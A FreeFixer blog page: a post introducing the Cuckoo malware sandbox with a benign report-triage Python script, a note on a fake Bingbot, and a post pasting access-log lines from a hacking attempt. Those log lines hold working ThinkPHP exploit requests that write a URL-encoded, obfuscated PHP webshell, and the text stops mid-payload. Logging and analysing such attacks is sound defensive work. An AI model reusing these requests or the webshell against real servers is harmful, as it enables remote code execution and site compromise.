About Roger Karlsson

Roger Karlsson is the programmer of the FreeFixer tool and the guy that posts on the FreeFixer blog.

Say Hi To Cuckoo Sandbox!

Cuckoo is an open source automated malware analysis tool. It can execute files and monitor their behaviour. And if you are running FreeFixer, your suspicious files will also be analysed by the sandbox. For free.

I’ll try to explain in more detail what Cuckoo can do by using examples from the Cuckoo reports on files listed here at freefixer.com:

One of the most useful features is that Cuckoo can trace API calls. Here’s an example from RunBoosterUpdateTask64.exe, where you can see that it calls CreateServiceW to register a driver named WinDivert64.sys. This is pretty useful if you are trying to find out what a particular file on your system is doing.

"call": {
  "category": "services",
  "status": 1,
  "stacktrace": [],
  "api": "CreateServiceW",
  "return_value": 4536928,
  "arguments": {
    "service_start_name": "",
    "start_type": 2,
    "service_handle": "0x0000000000453a60",
    "display_name": "WinDivert1.2",
    "error_control": 1,
    "service_name": "WinDivert1.2",
    "filepath": "C:\\Windows\\System32\\drivers\\WinDivert64.sys",
    "filepath_r": "C:\\Windows\\system32\\drivers\\WinDivert64.sys",
    "service_manager_handle": "0x0000000000453a00",
    "desired_access": 983551,
    "service_type": 1,
    "password": ""
  },
  "time": 1576385586.79675,
  "tid": 2436,
  "flags": {}
}

Cuckoo also monitors host name resolution. Here’s another example from the log, where RunBoosterUpdateTask64.exe tries to get the IP address for update.updinfo.xyz:

"resolves_host": [ "update.updinfo.xyz" ]

And the list goes on. Cuckoo detects anti-virtualisation tactics. For example, Cuckoo will notice if the file under test checks for the existence of VMware/VirtualBox registry keys or files.

Here’s an example from armsvc.exe where Cuckoo notices that the process is trying to detect whether it is running in VMware by using the in instruction:

{
  "markcount": 1,
  "families": [],
  "description": "Detects VMWare through the in instruction feature",
  "severity": 3,
...

Cuckoo will detect potentially compressed or encrypted data in executable files by measuring the entropy of the file. Cuckoo can also step through installation wizards and takes screenshots during the analysis. It will also log UDP and TCP connections.

I’m impressed by all the features.

So, I’ve set up a Cuckoo installation that freefixer.com will use to analyse files. The approach is simple: freefixer.com uploads files to the sandbox and, after a while, the analysis is displayed on the web site. I’ve decided to display the Summary, Generic, Dropped, Signatures, Yara, and Network sections from the sandbox report. Here’s an example report for armsvc.exe:

I’ve been running Cuckoo for some time now, and it has analysed more than 6000 files. I’m pretty happy with the results so far. Cuckoo just keeps on running, analysing one file after another.

I’ve identified a number of issues that need to be addressed:

  • Lots of noise! The reports from Cuckoo can be quite verbose and it can be difficult for users to identify the most interesting parts of the log. This is a pretty difficult problem that I’m not sure how to fix. An automated approach is needed to pinpoint the most interesting parts of the log.
  • Identical screenshots. The sandbox generates screenshots that are almost identical. I’m currently using ImageMagick to compare images for similarity, but it does not work well enough. I think the code needs another round of tuning.
  • The web site needs to explain what the items in the log mean. For example, what do UDP packets sent from the local host to 224.0.0.255 at port 5355 mean? (It’s a name resolution for hosts on the same local link.)
  • The JSON reports are shown in fixed-size text areas (<pre></pre>) with vertical and horizontal scrollbars. This works OK when the amount of JSON data is small, but terribly when dealing with large amounts of data. Please let me know if you have some ideas on how to present the JSON data in smart ways.
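The noise problem in the first item, together with the API-call tracing, host resolution, connection logging and entropy check described earlier in the post, is what the following script works on. It is an added example and not FreeFixer's or Cuckoo's own code. The report it reads is constructed: the field names come from the fragments quoted above (a "call" record with category, api and arguments; "resolves_host"; signatures with description and severity), while the nesting (behavior.processes[].calls, behavior.summary.resolves_host, network.udp and network.tcp, a top-level signatures list) is my assumption about how a Cuckoo report.json lays them out. It keeps only API calls on a short watchlist, registry writes to persistence keys, signatures of severity 2 and up, resolved hosts and non-local flows, and labels multicast UDP on port 5355 as LLMNR name resolution on the local link. shannon_entropy is the byte-entropy measure behind the packed-or-encrypted check.

```python
"""Pick the interesting parts out of a Cuckoo-style report.json and measure byte
entropy the way a packer check does. Added example, not FreeFixer's or Cuckoo's
own code: SAMPLE_REPORT is constructed; its field names follow the fragments
quoted in the post ("call" records with category/api/arguments, "resolves_host",
signatures with description/severity) and its nesting is my assumption."""
import ipaddress
import json
import math
from collections import Counter

# API calls that say something about what a file does; everything else in the
# trace is treated as noise unless a signature fires on it.
INTERESTING_APIS = {
    "CreateServiceW": "registers a service or driver",
    "CreateProcessInternalW": "starts another process",
    "RegSetValueExW": "writes a registry value",
    "WriteProcessMemory": "writes into another process",
}
# Registry paths (lower-case substrings) where a write means persistence.
PERSISTENCE_KEYS = ("\\currentversion\\run", "\\services\\", "\\winlogon\\")
# Sandbox-local destinations: network chatter rather than the sample's own traffic.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "224.0.0.0/4")]

def interesting_calls(report):
    hits = []
    for proc in report.get("behavior", {}).get("processes", []):
        for call in proc.get("calls", []):
            api, args = call.get("api", ""), call.get("arguments", {})
            why = INTERESTING_APIS.get(api)
            if api.startswith("RegSetValue") and not any(
                    k in args.get("regkey", "").lower() for k in PERSISTENCE_KEYS):
                why = None  # ordinary registry write: noise
            if why:
                hits.append({"process": proc.get("process_name"), "api": api, "why": why,
                             "target": args.get("filepath") or args.get("regkey") or ""})
    return hits

def notable_signatures(report, min_severity=2):
    sigs = [s for s in report.get("signatures", []) if s.get("severity", 0) >= min_severity]
    return sorted(sigs, key=lambda s: -s["severity"])

def network_summary(report):
    hosts = list(report.get("behavior", {}).get("summary", {}).get("resolves_host", []))
    flows, noise = [], []
    for proto in ("udp", "tcp"):
        for flow in report.get("network", {}).get(proto, []):
            dst, dport = flow.get("dst", ""), flow.get("dport")
            try:
                addr = ipaddress.ip_address(dst)
            except ValueError:
                continue
            if proto == "udp" and addr.is_multicast and dport == 5355:
                noise.append(f"udp {dst}:{dport} LLMNR name lookup on the local link")
            elif any(addr in net for net in LOCAL_NETS):
                noise.append(f"{proto} {dst}:{dport} local traffic")
            else:
                flows.append(f"{proto} {dst}:{dport}")
    return {"resolves_host": hosts, "flows": flows, "noise": noise}

def shannon_entropy(data):
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly random bytes;
    values near 8 over a whole section point at packed or encrypted content."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def triage(report):
    return {"calls": interesting_calls(report), "signatures": notable_signatures(report),
            "network": network_summary(report)}

# Constructed report: the CreateServiceW call, resolved host and VMware signature
# mirror the post's fragments; the other entries are made-up noise.
SAMPLE_REPORT = {
    "behavior": {
        "summary": {"resolves_host": ["update.updinfo.xyz"]},
        "processes": [{"process_name": "RunBoosterUpdateTask64.exe", "pid": 2436, "calls": [
            {"category": "services", "api": "CreateServiceW", "status": 1, "return_value": 4536928,
             "arguments": {"service_name": "WinDivert1.2", "start_type": 2, "service_type": 1,
                           "filepath": "C:\\Windows\\System32\\drivers\\WinDivert64.sys"}},
            {"category": "registry", "api": "RegSetValueExW", "status": 1,
             "arguments": {"regkey": "HKEY_CURRENT_USER\\Software\\Updater", "value": "LastRun"}},
            {"category": "registry", "api": "RegSetValueExW", "status": 1,
             "arguments": {"regkey": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
                           "value": "RunBooster"}},
        ]}]},
    "network": {"udp": [{"dst": "224.0.0.252", "dport": 5355}],
                "tcp": [{"dst": "198.51.100.20", "dport": 80}]},
    "signatures": [
        {"description": "Checks the amount of memory in the system", "severity": 1, "families": []},
        {"description": "Detects VMWare through the in instruction feature", "severity": 3, "families": []},
    ],
}

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_REPORT), indent=2))
```

On a real report the same functions apply to whatever json.load returns; the API watchlist, the persistence key list and LOCAL_NETS are the knobs to tune when the output is still too noisy or drops something you wanted to see.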

I’m hoping, now that you have another tool to analyse files, that this will help you to track down and remove that malware running on your machine.

50.116.69.213 – Bingbot at Bluehost?

For the last week I’ve been trying to get rid of various types of badly behaved bots visiting Freefixer.com. I have a small Python script that flags suspicious Bingbots. The script detected 50.116.69.213:

50.116.69.213 - - [10/Sep/2019:20:43:53 -0700] "GET /freefixer.xml HTTP/1.1" 200 9808 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

As you can see, when I do a reverse IP lookup for 50.116.69.213, the returned hostname ends with .bluehost.com. 50.116.69.213 is clearly not a real Bingbot.

Typically I would block anyone falsely claiming to be a Bingbot. But given that it only polls the FreeFixer XML PAD file, it’s possible that 50.116.69.213 is running a software listing site. Setting the user agent to Bingbot could just be a sloppy programming error. I will not block 50.116.69.213.

50.116.69.213 is located in Houston:

124.156.120.3 – Another Hacking Attempt

Found another hacking attempt this morning when examining the access.log. I’ve pasted the requests from 124.156.120.3 below. They appear to be attempts to inject PHP and SQL code. In addition, 124.156.120.3 also identifies itself as Bingbot, which obviously is not true.

124.156.120.3 seems to be assigned to Singapore Tencent Cloud Computing (Beijing) Co. Ltd. It’s likely that one of their customers has been hacked. Here’s the location on a Google map:

124.156.120.3 - - [17/Sep/2019:14:08:53 -0700] "PUT //QqYN1A763TmozH0L.txt HTTP/1.1" 404 4221 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:54 -0700] "GET //type.php?template=tag_(){};@unlink(FILE);print_r(blshell);assert($_POST[KxVHuP17U239lQyI]);{//../rss HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:54 -0700] "GET //data/cache_template/rss.tpl.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:55 -0700] "GET //index.php?s=index/\think\template\driver\file/write&cacheFile=53USa9rmzg916cmW.php&content=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%
27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E
%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:55 -0700] "GET //53USa9rmzg916cmW.php HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:56 -0700] "GET //?s=index/\think\template\driver\file/write&cacheFile=53USa9rmzg916cmW.php&content=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%
3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65
%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 200 7350 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:57 -0700] "GET //53USa9rmzg916cmW.php HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:57 -0700] "GET //?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=53USa9rmzg916cmW.php&vars[1][]=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75
%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%